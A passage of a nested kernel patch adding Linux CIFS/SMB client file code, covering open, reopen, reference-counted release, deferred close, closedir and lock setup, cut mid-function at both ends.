++			     cifs_remap(cifs_sb));
++	cifs_put_tlink(tlink);
++
++	if (rc)
++		goto posix_open_ret;
++
++	if (presp_data->Type == cpu_to_le32(-1))
++		goto posix_open_ret; /* open ok, caller does qpathinfo */
++
++	if (!pinode)
++		goto posix_open_ret; /* caller does not need info */
++
++	cifs_unix_basic_to_fattr(&fattr, presp_data, cifs_sb);
++
++	/* get new inode and set it up */
++	if (*pinode == NULL) {
++		cifs_fill_uniqueid(sb, &fattr);
++		*pinode = cifs_iget(sb, &fattr);
++		if (!*pinode) {
++			rc = -ENOMEM;
++			goto posix_open_ret;
++		}
++	} else {
++		cifs_revalidate_mapping(*pinode);
++		rc = cifs_fattr_to_inode(*pinode, &fattr);
++	}
++
++posix_open_ret:
++	kfree(presp_data);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_sb_info *cifs_sb,
++			struct cifs_tcon *tcon, unsigned int f_flags, __u32 *oplock,
++			struct cifs_fid *fid, unsigned int xid, struct cifs_open_info_data *buf)
++{
++	int rc;
++	int desired_access;
++	int disposition;
++	int create_options = CREATE_NOT_DIR;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_open_parms oparms;
++
++	if (!server->ops->open)
++		return -ENOSYS;
++
++	desired_access = cifs_convert_flags(f_flags);
++
++/*********************************************************************
++ *  open flag mapping table:
++ *
++ *	POSIX Flag            CIFS Disposition
++ *	----------            ----------------
++ *	O_CREAT               FILE_OPEN_IF
++ *	O_CREAT | O_EXCL      FILE_CREATE
++ *	O_CREAT | O_TRUNC     FILE_OVERWRITE_IF
++ *	O_TRUNC               FILE_OVERWRITE
++ *	none of the above     FILE_OPEN
++ *
++ *	Note that there is not a direct POSIX match for disposition
++ *	FILE_SUPERSEDE (ie create whether or not the file exists);
++ *	O_CREAT | O_TRUNC is similar but truncates the existing
++ *	file rather than creating a new file as FILE_SUPERSEDE does
++ *	(which uses the attributes / metadata passed in on the open call).
++ *?
++ *?  O_SYNC is a reasonable match to CIFS writethrough flag
++ *?  and the read write flags match reasonably.  O_LARGEFILE
++ *?  is irrelevant because largefile support is always used
++ *?  by this client. Flags O_APPEND, O_DIRECT, O_DIRECTORY,
++ *	 O_FASYNC, O_NOFOLLOW, O_NONBLOCK need further investigation
++ *********************************************************************/
++
++	disposition = cifs_get_disposition(f_flags);
++
++	/* BB pass O_SYNC flag through on file attributes .. BB */
++
++	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
++	if (f_flags & O_SYNC)
++		create_options |= CREATE_WRITE_THROUGH;
++
++	if (f_flags & O_DIRECT)
++		create_options |= CREATE_NO_BUFFER;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++	};
++
++	rc = server->ops->open(xid, &oparms, oplock, buf);
++	if (rc)
++		return rc;
++
++	/* TODO: Add support for calling posix query info but with passing in fid */
++	if (tcon->unix_ext)
++		rc = cifs_get_inode_info_unix(&inode, full_path, inode->i_sb,
++					      xid);
++	else
++		rc = cifs_get_inode_info(&inode, full_path, buf, inode->i_sb,
++					 xid, fid);
++
++	if (rc) {
++		server->ops->close(xid, tcon, fid);
++		if (rc == -ESTALE)
++			rc = -EOPENSTALE;
++	}
++
++	return rc;
++}
++
++static bool
++cifs_has_mand_locks(struct cifsInodeInfo *cinode)
++{
++	struct cifs_fid_locks *cur;
++	bool has_locks = false;
++
++	down_read(&cinode->lock_sem);
++	list_for_each_entry(cur, &cinode->llist, llist) {
++		if (!list_empty(&cur->locks)) {
++			has_locks = true;
++			break;
++		}
++	}
++	up_read(&cinode->lock_sem);
++	return has_locks;
++}
++
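++/* Acquire @sem for write by polling, sleeping 10ms between attempts */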
++void
++cifs_down_write(struct rw_semaphore *sem)
++{
++	while (!down_write_trylock(sem))
++		msleep(10);
++}
++
++static void cifsFileInfo_put_work(struct work_struct *work);
++
++struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
++				       struct tcon_link *tlink, __u32 oplock,
++				       const char *symlink_target)
++{
++	struct dentry *dentry = file_dentry(file);
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifsFileInfo *cfile;
++	struct cifs_fid_locks *fdlocks;
++	struct cifs_tcon *tcon = tlink_tcon(tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	cfile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
++	if (cfile == NULL)
++		return cfile;
++
++	fdlocks = kzalloc(sizeof(struct cifs_fid_locks), GFP_KERNEL);
++	if (!fdlocks) {
++		kfree(cfile);
++		return NULL;
++	}
++
++	if (symlink_target) {
++		cfile->symlink_target = kstrdup(symlink_target, GFP_KERNEL);
++		if (!cfile->symlink_target) {
++			kfree(fdlocks);
++			kfree(cfile);
++			return NULL;
++		}
++	}
++
++	INIT_LIST_HEAD(&fdlocks->locks);
++	fdlocks->cfile = cfile;
++	cfile->llist = fdlocks;
++
++	cfile->count = 1;
++	cfile->pid = current->tgid;
++	cfile->uid = current_fsuid();
++	cfile->dentry = dget(dentry);
++	cfile->f_flags = file->f_flags;
++	cfile->invalidHandle = false;
++	cfile->deferred_close_scheduled = false;
++	cfile->tlink = cifs_get_tlink(tlink);
++	INIT_WORK(&cfile->oplock_break, cifs_oplock_break);
++	INIT_WORK(&cfile->put, cifsFileInfo_put_work);
++	INIT_DELAYED_WORK(&cfile->deferred, smb2_deferred_work_close);
++	mutex_init(&cfile->fh_mutex);
++	spin_lock_init(&cfile->file_info_lock);
++
++	cifs_sb_active(inode->i_sb);
++
++	/*
++	 * If the server returned a read oplock and we have mandatory brlocks,
++	 * set oplock level to None.
++	 */
++	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
++		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
++		oplock = 0;
++	}
++
++	cifs_down_write(&cinode->lock_sem);
++	list_add(&fdlocks->llist, &cinode->llist);
++	up_write(&cinode->lock_sem);
++
++	spin_lock(&tcon->open_file_lock);
++	if (fid->pending_open->oplock != CIFS_OPLOCK_NO_CHANGE && oplock)
++		oplock = fid->pending_open->oplock;
++	list_del(&fid->pending_open->olist);
++
++	fid->purge_cache = false;
++	server->ops->set_fid(cfile, fid, oplock);
++
++	list_add(&cfile->tlist, &tcon->openFileList);
++	atomic_inc(&tcon->num_local_opens);
++
++	/* if readable file instance, put it first in the list */
++	spin_lock(&cinode->open_file_lock);
++	if (file->f_mode & FMODE_READ)
++		list_add(&cfile->flist, &cinode->openFileList);
++	else
++		list_add_tail(&cfile->flist, &cinode->openFileList);
++	spin_unlock(&cinode->open_file_lock);
++	spin_unlock(&tcon->open_file_lock);
++
++	if (fid->purge_cache)
++		cifs_zap_mapping(inode);
++
++	file->private_data = cfile;
++	return cfile;
++}
++
++struct cifsFileInfo *
++cifsFileInfo_get(struct cifsFileInfo *cifs_file)
++{
++	spin_lock(&cifs_file->file_info_lock);
++	cifsFileInfo_get_locked(cifs_file);
++	spin_unlock(&cifs_file->file_info_lock);
++	return cifs_file;
++}
++
++static void cifsFileInfo_put_final(struct cifsFileInfo *cifs_file)
++{
++	struct inode *inode = d_inode(cifs_file->dentry);
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct cifsLockInfo *li, *tmp;
++	struct super_block *sb = inode->i_sb;
++
++	/*
++	 * Delete any outstanding lock records. We'll lose them when the file
++	 * is closed anyway.
++	 */
++	cifs_down_write(&cifsi->lock_sem);
++	list_for_each_entry_safe(li, tmp, &cifs_file->llist->locks, llist) {
++		list_del(&li->llist);
++		cifs_del_lock_waiters(li);
++		kfree(li);
++	}
++	list_del(&cifs_file->llist->llist);
++	kfree(cifs_file->llist);
++	up_write(&cifsi->lock_sem);
++
++	cifs_put_tlink(cifs_file->tlink);
++	dput(cifs_file->dentry);
++	cifs_sb_deactive(sb);
++	kfree(cifs_file->symlink_target);
++	kfree(cifs_file);
++}
++
++static void cifsFileInfo_put_work(struct work_struct *work)
++{
++	struct cifsFileInfo *cifs_file = container_of(work,
++			struct cifsFileInfo, put);
++
++	cifsFileInfo_put_final(cifs_file);
++}
++
++/**
++ * cifsFileInfo_put - release a reference of file priv data
++ *
++ * Always potentially wait for oplock handler. See _cifsFileInfo_put().
++ *
++ * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
++ */
++void cifsFileInfo_put(struct cifsFileInfo *cifs_file)
++{
++	_cifsFileInfo_put(cifs_file, true, true);
++}
++
++/**
++ * _cifsFileInfo_put - release a reference of file priv data
++ *
++ * This may involve closing the filehandle @cifs_file out on the
++ * server. Must be called without holding tcon->open_file_lock,
++ * cinode->open_file_lock and cifs_file->file_info_lock.
++ *
++ * If @wait_for_oplock_handler is true and we are releasing the last
++ * reference, wait for any running oplock break handler of the file
++ * and cancel any pending one.
++ *
++ * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
++ * @wait_oplock_handler: must be false if called from oplock_break_handler
++ * @offload:	not offloaded on close and oplock breaks
++ *
++ */
++void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
++		       bool wait_oplock_handler, bool offload)
++{
++	struct inode *inode = d_inode(cifs_file->dentry);
++	struct cifs_tcon *tcon = tlink_tcon(cifs_file->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct super_block *sb = inode->i_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_fid fid = {};
++	struct cifs_pending_open open;
++	bool oplock_break_cancelled;
++
++	spin_lock(&tcon->open_file_lock);
++	spin_lock(&cifsi->open_file_lock);
++	spin_lock(&cifs_file->file_info_lock);
++	if (--cifs_file->count > 0) {
++		spin_unlock(&cifs_file->file_info_lock);
++		spin_unlock(&cifsi->open_file_lock);
++		spin_unlock(&tcon->open_file_lock);
++		return;
++	}
++	spin_unlock(&cifs_file->file_info_lock);
++
++	if (server->ops->get_lease_key)
++		server->ops->get_lease_key(inode, &fid);
++
++	/* store open in pending opens to make sure we don't miss lease break */
++	cifs_add_pending_open_locked(&fid, cifs_file->tlink, &open);
++
++	/* remove it from the lists */
++	list_del(&cifs_file->flist);
++	list_del(&cifs_file->tlist);
++	atomic_dec(&tcon->num_local_opens);
++
++	if (list_empty(&cifsi->openFileList)) {
++		cifs_dbg(FYI, "closing last open instance for inode %p\n",
++			 d_inode(cifs_file->dentry));
++		/*
++		 * In strict cache mode we need to invalidate the mapping on the
++		 * last close because it may cause an error when we open this file
++		 * again and get at least level II oplock.
++		 */
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
++			set_bit(CIFS_INO_INVALID_MAPPING, &cifsi->flags);
++		cifs_set_oplock_level(cifsi, 0);
++	}
++
++	spin_unlock(&cifsi->open_file_lock);
++	spin_unlock(&tcon->open_file_lock);
++
++	oplock_break_cancelled = wait_oplock_handler ?
++		cancel_work_sync(&cifs_file->oplock_break) : false;
++
++	if (!tcon->need_reconnect && !cifs_file->invalidHandle) {
++		struct TCP_Server_Info *server = tcon->ses->server;
++		unsigned int xid;
++
++		xid = get_xid();
++		if (server->ops->close_getattr)
++			server->ops->close_getattr(xid, tcon, cifs_file);
++		else if (server->ops->close)
++			server->ops->close(xid, tcon, &cifs_file->fid);
++		_free_xid(xid);
++	}
++
++	if (oplock_break_cancelled)
++		cifs_done_oplock_break(cifsi);
++
++	cifs_del_pending_open(&open);
++
++	if (offload)
++		queue_work(fileinfo_put_wq, &cifs_file->put);
++	else
++		cifsFileInfo_put_final(cifs_file);
++}
++
++int cifs_open(struct inode *inode, struct file *file)
++{
++	int rc = -EACCES;
++	unsigned int xid;
++	__u32 oplock;
++	struct cifs_sb_info *cifs_sb;
++	struct TCP_Server_Info *server;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cifsFileInfo *cfile = NULL;
++	void *page;
++	const char *full_path;
++	bool posix_open_ok = false;
++	struct cifs_fid fid = {};
++	struct cifs_pending_open open;
++	struct cifs_open_info_data data = {};
++
++	xid = get_xid();
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
++		free_xid(xid);
++		return -EIO;
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		free_xid(xid);
++		return PTR_ERR(tlink);
++	}
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(file_dentry(file), page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	cifs_dbg(FYI, "inode = 0x%p file flags are 0x%x for %s\n",
++		 inode, file->f_flags, full_path);
++
++	if (file->f_flags & O_DIRECT &&
++	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++			file->f_op = &cifs_file_direct_nobrl_ops;
++		else
++			file->f_op = &cifs_file_direct_ops;
++	}
++
++	/* Get the cached handle as SMB2 close is deferred */
++	rc = cifs_get_readable_path(tcon, full_path, &cfile);
++	if (rc == 0) {
++		if (file->f_flags == cfile->f_flags) {
++			file->private_data = cfile;
++			spin_lock(&CIFS_I(inode)->deferred_lock);
++			cifs_del_deferred_close(cfile);
++			spin_unlock(&CIFS_I(inode)->deferred_lock);
++			goto use_cache;
++		} else {
++			_cifsFileInfo_put(cfile, true, false);
++		}
++	}
++
++	if (server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (!tcon->broken_posix_open && tcon->unix_ext &&
++	    cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		/* can not refresh inode info since size could be stale */
++		rc = cifs_posix_open(full_path, &inode, inode->i_sb,
++				cifs_sb->ctx->file_mode /* ignored */,
++				file->f_flags, &oplock, &fid.netfid, xid);
++		if (rc == 0) {
++			cifs_dbg(FYI, "posix open succeeded\n");
++			posix_open_ok = true;
++		} else if ((rc == -EINVAL) || (rc == -EOPNOTSUPP)) {
++			if (tcon->ses->serverNOS)
++				cifs_dbg(VFS, "server %s of type %s returned unexpected error on SMB posix open, disabling posix open support. Check if server update available.\n",
++					 tcon->ses->ip_addr,
++					 tcon->ses->serverNOS);
++			tcon->broken_posix_open = true;
++		} else if ((rc != -EIO) && (rc != -EREMOTE) &&
++			 (rc != -EOPNOTSUPP)) /* path not found or net err */
++			goto out;
++		/*
++		 * Otherwise fall through and retry the open the old way on
++		 * network I/O or DFS errors.
++		 */
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (server->ops->get_lease_key)
++		server->ops->get_lease_key(inode, &fid);
++
++	cifs_add_pending_open(&fid, tlink, &open);
++
++	if (!posix_open_ok) {
++		if (server->ops->get_lease_key)
++			server->ops->get_lease_key(inode, &fid);
++
++		rc = cifs_nt_open(full_path, inode, cifs_sb, tcon, file->f_flags, &oplock, &fid,
++				  xid, &data);
++		if (rc) {
++			cifs_del_pending_open(&open);
++			goto out;
++		}
++	}
++
++	cfile = cifs_new_fileinfo(&fid, file, tlink, oplock, data.symlink_target);
++	if (cfile == NULL) {
++		if (server->ops->close)
++			server->ops->close(xid, tcon, &fid);
++		cifs_del_pending_open(&open);
++		rc = -ENOMEM;
++		goto out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if ((oplock & CIFS_CREATE_ACTION) && !posix_open_ok && tcon->unix_ext) {
++		/*
++		 * Time to set mode which we can not set earlier due to
++		 * problems creating new read-only files.
++		 */
++		struct cifs_unix_set_info_args args = {
++			.mode	= inode->i_mode,
++			.uid	= INVALID_UID, /* no change */
++			.gid	= INVALID_GID, /* no change */
++			.ctime	= NO_CHANGE_64,
++			.atime	= NO_CHANGE_64,
++			.mtime	= NO_CHANGE_64,
++			.device	= 0,
++		};
++		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid.netfid,
++				       cfile->pid);
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++use_cache:
++	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
++			   file->f_mode & FMODE_WRITE);
++	if (file->f_flags & O_DIRECT &&
++	    (!((file->f_flags & O_ACCMODE) != O_RDONLY) ||
++	     file->f_flags & O_APPEND))
++		cifs_invalidate_cache(file_inode(file),
++				      FSCACHE_INVAL_DIO_WRITE);
++
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	cifs_free_open_info(&data);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int cifs_push_posix_locks(struct cifsFileInfo *cfile);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/*
++ * Try to reacquire byte-range locks that were released when the session
++ * to the server was lost.
++ */
++static int
++cifs_relock_file(struct cifsFileInfo *cfile)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	int rc = 0;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	down_read_nested(&cinode->lock_sem, SINGLE_DEPTH_NESTING);
++	if (cinode->can_cache_brlcks) {
++		/* can cache locks - no need to relock */
++		up_read(&cinode->lock_sem);
++		return rc;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		rc = cifs_push_posix_locks(cfile);
++	else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		rc = tcon->ses->server->ops->push_mand_locks(cfile);
++
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++static int
++cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
++{
++	int rc = -EACCES;
++	unsigned int xid;
++	__u32 oplock;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsInodeInfo *cinode;
++	struct inode *inode;
++	void *page;
++	const char *full_path;
++	int desired_access;
++	int disposition = FILE_OPEN;
++	int create_options = CREATE_NOT_DIR;
++	struct cifs_open_parms oparms;
++
++	xid = get_xid();
++	mutex_lock(&cfile->fh_mutex);
++	if (!cfile->invalidHandle) {
++		mutex_unlock(&cfile->fh_mutex);
++		free_xid(xid);
++		return 0;
++	}
++
++	inode = d_inode(cfile->dentry);
++	cifs_sb = CIFS_SB(inode->i_sb);
++	tcon = tlink_tcon(cfile->tlink);
++	server = tcon->ses->server;
++
++	/*
++	 * Cannot grab the rename sem here because various ops, including
++	 * those that already hold the rename sem, can end up causing
++	 * writepage to get called; if the server was down, that means we end
++	 * up here, and we can never tell if the caller already holds the
++	 * rename_sem.
++	 */
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(cfile->dentry, page);
++	if (IS_ERR(full_path)) {
++		mutex_unlock(&cfile->fh_mutex);
++		free_dentry_path(page);
++		free_xid(xid);
++		return PTR_ERR(full_path);
++	}
++
++	cifs_dbg(FYI, "inode = 0x%p file flags 0x%x for %s\n",
++		 inode, cfile->f_flags, full_path);
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext && cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		/*
++		 * O_CREAT, O_EXCL and O_TRUNC already had their effect on the
++		 * original open. Must mask them off for a reopen.
++		 */
++		unsigned int oflags = cfile->f_flags &
++						~(O_CREAT | O_EXCL | O_TRUNC);
++
++		rc = cifs_posix_open(full_path, NULL, inode->i_sb,
++				     cifs_sb->ctx->file_mode /* ignored */,
++				     oflags, &oplock, &cfile->fid.netfid, xid);
++		if (rc == 0) {
++			cifs_dbg(FYI, "posix reopen succeeded\n");
++			oparms.reconnect = true;
++			goto reopen_success;
++		}
++		/*
++		 * Fall through and retry the open the old way on errors;
++		 * especially in the reconnect path it is important to retry
++		 * hard.
++		 */
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	desired_access = cifs_convert_flags(cfile->f_flags);
++
++	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
++	if (cfile->f_flags & O_SYNC)
++		create_options |= CREATE_WRITE_THROUGH;
++
++	if (cfile->f_flags & O_DIRECT)
++		create_options |= CREATE_NO_BUFFER;
++
++	if (server->ops->get_lease_key)
++		server->ops->get_lease_key(inode, &cfile->fid);
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = &cfile->fid,
++		.reconnect = true,
++	};
++
++	/*
++	 * Cannot refresh the inode by passing in a file_info buf to be
++	 * returned by ops->open and then calling get_inode_info with the
++	 * returned buf, since the file might have write-behind data that
++	 * needs to be flushed and the server's version of the file size can
++	 * be stale. If we knew for sure that the inode was not dirty locally
++	 * we could do this.
++	 */
++	rc = server->ops->open(xid, &oparms, &oplock, NULL);
++	if (rc == -ENOENT && oparms.reconnect == false) {
++		/* durable handle timeout is expired - open the file again */
++		rc = server->ops->open(xid, &oparms, &oplock, NULL);
++		/* indicate that we need to relock the file */
++		oparms.reconnect = true;
++	}
++
++	if (rc) {
++		mutex_unlock(&cfile->fh_mutex);
++		cifs_dbg(FYI, "cifs_reopen returned 0x%x\n", rc);
++		cifs_dbg(FYI, "oplock: %d\n", oplock);
++		goto reopen_error_exit;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++reopen_success:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	cfile->invalidHandle = false;
++	mutex_unlock(&cfile->fh_mutex);
++	cinode = CIFS_I(inode);
++
++	if (can_flush) {
++		rc = filemap_write_and_wait(inode->i_mapping);
++		if (!is_interrupt_error(rc))
++			mapping_set_error(inode->i_mapping, rc);
++
++		if (tcon->posix_extensions)
++			rc = smb311_posix_get_inode_info(&inode, full_path, inode->i_sb, xid);
++		else if (tcon->unix_ext)
++			rc = cifs_get_inode_info_unix(&inode, full_path,
++						      inode->i_sb, xid);
++		else
++			rc = cifs_get_inode_info(&inode, full_path, NULL,
++						 inode->i_sb, xid, NULL);
++	}
++	/*
++	 * Else we are already writing out data to the server and could
++	 * deadlock if we tried to flush it; since we do not know if we have
++	 * data that would invalidate the current end of file on the server,
++	 * we cannot go to the server to get the new inode info.
++	 */
++
++	/*
++	 * If the server returned a read oplock and we have mandatory brlocks,
++	 * set oplock level to None.
++	 */
++	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
++		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
++		oplock = 0;
++	}
++
++	server->ops->set_fid(cfile, &cfile->fid, oplock);
++	if (oparms.reconnect)
++		cifs_relock_file(cfile);
++
++reopen_error_exit:
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
++
++void smb2_deferred_work_close(struct work_struct *work)
++{
++	struct cifsFileInfo *cfile = container_of(work,
++			struct cifsFileInfo, deferred.work);
++
++	spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++	cifs_del_deferred_close(cfile);
++	cfile->deferred_close_scheduled = false;
++	spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
++	_cifsFileInfo_put(cfile, true, false);
++}
++
++int cifs_close(struct inode *inode, struct file *file)
++{
++	struct cifsFileInfo *cfile;
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_deferred_close *dclose;
++
++	cifs_fscache_unuse_inode_cookie(inode, file->f_mode & FMODE_WRITE);
++
++	if (file->private_data != NULL) {
++		cfile = file->private_data;
++		file->private_data = NULL;
++		dclose = kmalloc(sizeof(struct cifs_deferred_close), GFP_KERNEL);
++		if ((cinode->oplock == CIFS_CACHE_RHW_FLG) &&
++		    cinode->lease_granted &&
++		    !test_bit(CIFS_INO_CLOSE_ON_LOCK, &cinode->flags) &&
++		    dclose) {
++			if (test_and_clear_bit(CIFS_INO_MODIFIED_ATTR, &cinode->flags)) {
++				inode->i_ctime = inode->i_mtime = current_time(inode);
++			}
++			spin_lock(&cinode->deferred_lock);
++			cifs_add_deferred_close(cfile, dclose);
++			if (cfile->deferred_close_scheduled &&
++			    delayed_work_pending(&cfile->deferred)) {
++				/*
++				 * If there is no pending work, mod_delayed_work queues new work.
++				 * So, increase the ref count to avoid use-after-free.
++				 */
++				if (!mod_delayed_work(deferredclose_wq,
++						&cfile->deferred, cifs_sb->ctx->closetimeo))
++					cifsFileInfo_get(cfile);
++			} else {
++				/* Deferred close for files */
++				queue_delayed_work(deferredclose_wq,
++						&cfile->deferred, cifs_sb->ctx->closetimeo);
++				cfile->deferred_close_scheduled = true;
++				spin_unlock(&cinode->deferred_lock);
++				return 0;
++			}
++			spin_unlock(&cinode->deferred_lock);
++			_cifsFileInfo_put(cfile, true, false);
++		} else {
++			_cifsFileInfo_put(cfile, true, false);
++			kfree(dclose);
++		}
++	}
++
++	/* return code from the ->release op is always ignored */
++	return 0;
++}
++
++void
++cifs_reopen_persistent_handles(struct cifs_tcon *tcon)
++{
++	struct cifsFileInfo *open_file, *tmp;
++	struct list_head tmp_list;
++
++	if (!tcon->use_persistent || !tcon->need_reopen_files)
++		return;
++
++	tcon->need_reopen_files = false;
++
++	cifs_dbg(FYI, "Reopen persistent handles\n");
++	INIT_LIST_HEAD(&tmp_list);
++
++	/* list all files open on tree connection, reopen resilient handles  */
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(open_file, &tcon->openFileList, tlist) {
++		if (!open_file->invalidHandle)
++			continue;
++		cifsFileInfo_get(open_file);
++		list_add_tail(&open_file->rlist, &tmp_list);
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	list_for_each_entry_safe(open_file, tmp, &tmp_list, rlist) {
++		if (cifs_reopen_file(open_file, false /* do not flush */))
++			tcon->need_reopen_files = true;
++		list_del_init(&open_file->rlist);
++		cifsFileInfo_put(open_file);
++	}
++}
++
++int cifs_closedir(struct inode *inode, struct file *file)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	char *buf;
++
++	cifs_dbg(FYI, "Closedir inode = 0x%p\n", inode);
++
++	if (cfile == NULL)
++		return rc;
++
++	xid = get_xid();
++	tcon = tlink_tcon(cfile->tlink);
++	server = tcon->ses->server;
++
++	cifs_dbg(FYI, "Freeing private data in close dir\n");
++	spin_lock(&cfile->file_info_lock);
++	if (server->ops->dir_needs_close(cfile)) {
++		cfile->invalidHandle = true;
++		spin_unlock(&cfile->file_info_lock);
++		if (server->ops->close_dir)
++			rc = server->ops->close_dir(xid, tcon, &cfile->fid);
++		else
++			rc = -ENOSYS;
++		cifs_dbg(FYI, "Closing uncompleted readdir with rc %d\n", rc);
++		/* not much we can do if it fails anyway, ignore rc */
++		rc = 0;
++	} else
++		spin_unlock(&cfile->file_info_lock);
++
++	buf = cfile->srch_inf.ntwrk_buf_start;
++	if (buf) {
++		cifs_dbg(FYI, "closedir free smb buf in srch struct\n");
++		cfile->srch_inf.ntwrk_buf_start = NULL;
++		if (cfile->srch_inf.smallBuf)
++			cifs_small_buf_release(buf);
++		else
++			cifs_buf_release(buf);
++	}
++
++	cifs_put_tlink(cfile->tlink);
++	kfree(file->private_data);
++	file->private_data = NULL;
++	/* BB can we lock the filestruct while this is going on? */
++	free_xid(xid);
++	return rc;
++}
++
++static struct cifsLockInfo *
++cifs_lock_init(__u64 offset, __u64 length, __u8 type, __u16 flags)
++{
++	struct cifsLockInfo *lock =
++		kmalloc(sizeof(struct cifsLockInfo), GFP_KERNEL);
++	if (!lock)
++		return lock;
++	lock->offset = offset;
++	lock->length = length;
++	lock->type = type;
++	lock->pid = current->tgid;
++	lock->flags = flags;
++	INIT_LIST_HEAD(&lock->blist);
++	init_waitqueue_head(&lock->block_q);
++	return lock;
++}
++
++void
++cifs_del_lock_waiters(struct cifsLockInfo *lock)
++{
++	struct cifsLockInfo *li, *tmp;
++	list_for_each_entry_safe(li, tmp, &lock->blist, blist) {
++		list_del_init(&li->blist);
++		wake_up(&li->block_q);
++	}
++}
++
++#define CIFS_LOCK_OP	0
++#define CIFS_READ_OP	1
++#define CIFS_WRITE_OP	2
++
++/* @rw_check : 0 - no op, 1 - read, 2 - write */
++static bool
++cifs_find_fid_lock_conflict(struct cifs_fid_locks *fdlocks, __u64 offset,
++			    __u64 length, __u8 type, __u16 flags,
++			    struct cifsFileInfo *cfile,
